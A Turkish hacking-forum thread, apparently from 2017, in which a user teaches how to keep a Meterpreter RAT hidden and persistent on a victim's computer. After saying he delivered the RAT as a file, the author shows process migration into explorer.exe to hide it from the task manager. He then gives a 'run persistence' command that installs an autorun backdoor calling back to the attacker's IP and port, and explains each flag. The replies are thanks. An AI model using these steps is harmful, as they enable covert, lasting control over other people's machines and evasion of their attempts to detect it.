İPUCU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

Meterpreterde Kalıcılığı Sağlamak //Stajyer\\

Belvando - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Mantı V2
Mesajlar:
239
Konular:
34
Teşekkür (Etti):
59
Teşekkür (Aldı):
201
Ticaret:
(0) %
28-06-2017 13:09
#1
Meterpreterde Kalıcılığı Sağlamak //Stajyer\\
Arkadaşlar Merhaba

Bugün bilmeyenlerin çok işine yarayacak bir konu olan meterpreter sezonunu kalıcı kılmayı anlatacağım.


Meterpreter RAM üzerinde çalışan bir RAT türüdür.
RAM üzerinde çalışması onun hiçbir kalıntı bırakmaması için çok önemlidir.
Ama RAM üzerinde çalışmanın bir kötü yanı var.
Cihaz kendisini sıfırlayınca meterpreter sezonuda otamatikmen iptal oluyor.(Tabi geri açılmadığı sürece)
Bizde meterpreterin kalıcılığını arttırmak için belli yollar kullanıyoruz.
İsterseniz başlayalım.


İlk olarak bir meterpreter sezonu elde etmemiz lazım.(Eğer hiç bir bilginiz yoksa nasıl açılıcağı hakkında, diğer konuların açıklayıcı olacaktır.)
Ben normal olarak karşı tarafa dosya aracılığı ile RAT attım ve çalıştırılmasını sağladım.



Meterpreter sezonumuz açık durumda.
Karşı cihazda eğer çalışan işlemlere bakılırsa oarada rahatlıkla bizim RATımızın çalıştığı görünecektir.
(8mb lık bir RAM hafızasını işgal etmiş durumda)



Karşı taraf bir paranoyak olabilir ve her dakika başı görev yöneticisini kontrol ediyor ise bizi rahatlıkla fark edebilir.
Bunu alt etmek için RATımızı başka bir uygulamaya transfer etmemiz yeterlidir.
İlk olarak ps komutunu girerek çalışan işlemleri görüyoruz.



Burada görüldüğü üzere belli işlemler yürümekte.
Biz buradan öyle bir işlem seçicezki karşı tarafın kapatacağı en son şey olsun.

Tabiki windows bilgisayarlar için bu explorer olacaktır.(Linux cihazlarda gnome-desktop, plasmashell, Xorg gibi işlemler olabilir)
Seçtiğimiz işlemin id numarasını alıp bunu işlemde kullanıcaz.(explorer 1544 nolu idye sahip)
migrate 1544



Evet başarılı bir sonuç aldığınızda böyle bir çıktı gelecektir.
Şimdi isterseniz yeniden çalışan işlmelere bakalım.




Evet RATımız şuan gözükmemekte.

Bu kullanıcının fark etmesine yönelik kalıcılaştırma yöntemi idi.
Peki ya bahsettiğimiz gibi cihazı kapatıp açarsa.
Ozamanda olaya persistence adındaki postumuz giriyor.

Persistence karşı tarafa autorunla birlikte bir tane daha RAT yollar ve bunu bize yönlendirir.
run persistence -A -i 20 -p 4441 -r 192.168.1.25 -U ****sploitable



Evet komutumuzu girdikten sonra kontrol amaçlı bir tane daha sezon açıyor ve işlemimiz tamamlanıyor.

Persistence ile bilgi
-A parametresi RAT işleve geçtiğinde gelmesi gerektiğini belirtir.
-i RATımız bize ilk kısımdan ulaşamadı diyelim bunu 20 saniye aralıklarla tekrarlayarak bize ulaşması gerektiğini belirtiyor.
-p bize ulaşacağı portu belirtiyoruz.
-r bize ulaşacağı ip adresini seçiyoruz.
-U bu işleme mağruz kalıcak kullanıcının adını belirtiyoruz.

Okuduğunuz için teşşekkür ederim
Eğer beğendiseniz teşşekkür atmayı unutmayın.
Diğer konularıma burdan ulaşabilirsiniz:
http://www.turkhackteam.org/search.p...rchid=10446642

HEPİNİZ USTA BİR HACKERSINIZ, TABİ ÖĞRENMEK İSTERSENİZ.
---------------------
Bastığın yerleri 'toprak' diyerek geçme, tanı!
Düşün altındaki binlerce kefensiz yatanı.
Sen şehit oğlusun, incitme, yazıktır atanı;
Verme, dünyaları alsan da bu cennet vatanı.
Telegram: @belvando
Hardlose Teşekkür etti.
cewl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Merdekan
Yaş:
24
Mesajlar:
2.782
Konular:
182
Teşekkür (Etti):
0
Teşekkür (Aldı):
760
Ticaret:
(0) %
28-06-2017 13:17
#2
elne salik abi amma ben kalici olmani konusun acmisdim deyerli bilgi icin saol birde fikrimde karsi sistemdeki calisan rati uzakdan gorunmez edecek video cekmek isdirem amma cekecem
RoarCompany - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
4
Konular:
0
Teşekkür (Etti):
6
Teşekkür (Aldı):
0
Ticaret:
(0) %
28-06-2017 13:29
#3
teşekkürler yararlı bir paylaşım
Wiz Khalifa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Nereden:
WizLanda
Yaş:
2
Mesajlar:
947
Konular:
117
Teşekkür (Etti):
20
Teşekkür (Aldı):
329
Ticaret:
(0) %
28-06-2017 13:30
#4
Ellerinize Sağlık
---------------------
15.12.18
_MaC_ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2009
Nereden:
Bilinmezden
Mesajlar:
1.362
Konular:
35
Teşekkür (Etti):
136
Teşekkür (Aldı):
149
Ticaret:
(0) %
28-06-2017 13:53
#5
Ellerine Sağlık.
---------------------
01:10:11:01:01:10:00:01:01:10:00:11

2009-2018

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı